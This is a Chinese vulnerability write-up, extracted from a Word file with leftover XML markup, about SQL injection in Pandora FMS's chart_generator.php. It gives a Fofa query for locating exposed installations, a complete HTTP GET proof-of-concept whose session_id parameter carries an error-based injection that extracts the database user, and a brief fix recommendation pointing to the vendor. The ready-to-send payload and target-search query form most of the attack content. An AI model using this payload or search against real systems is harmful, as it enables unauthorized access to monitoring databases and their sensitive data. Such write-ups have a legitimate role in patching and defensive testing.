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PandoraFMS 监控软件 SQL注入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漏洞描述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Pandora FMS是西班牙Artica公司的一套监控系统。该系统通过可视化的方式监控网络、服务器、虚拟基础架构和应用程序等。Pandora FMS监控软件存在SQL注入漏洞，攻击者通过chart_generator.php 来执行恶意语句，获取数据库敏感信息。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漏洞复现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Fofa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app="PANDORAFMS-产品"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14645" cy="2392045"/>
            <wp:effectExtent l="0" t="0" r="10795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4645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界面如下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80685" cy="2689225"/>
            <wp:effectExtent l="0" t="0" r="5715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POC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GET /pandora_console/include/chart_generator.php?session_id=1'%20OR%20(SELECT%206562%20FROM(SELECT%20COUNT(*),CONCAT(0x7176767171,(SELECT%20MID((IFNULL(CAST(CURRENT_USER()%20AS%20NCHAR),0x20)),1,54)),0x71627a6a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20WIkG HTTP/1.1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Host: your-ip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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15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Accept-Encoding: gzip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Connection: close</w:t>
      </w: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46065" cy="1757680"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1016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606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修复建议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16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1、⼚商已发布了漏洞修复程序，请及时关注更新：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183C4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183C4"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://pandorafms.com/community/"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183C4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color w:val="4183C4"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://pandorafms.com/community/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4183C4"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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D5A8DC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9BD5A8D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GVlNmU0MDY3ZjU0MTgxOGRiNjg4OTc5NWFkNGI1NmUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="45A56BF4"/>
    <w:rsid w:val="52A0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2023-12-20T03:05:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-20T14:34:14Z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F809960957974BA2AF4DC54E9C5F349A_12</vt:lpwstr>
  </property>
</Properties>
</file>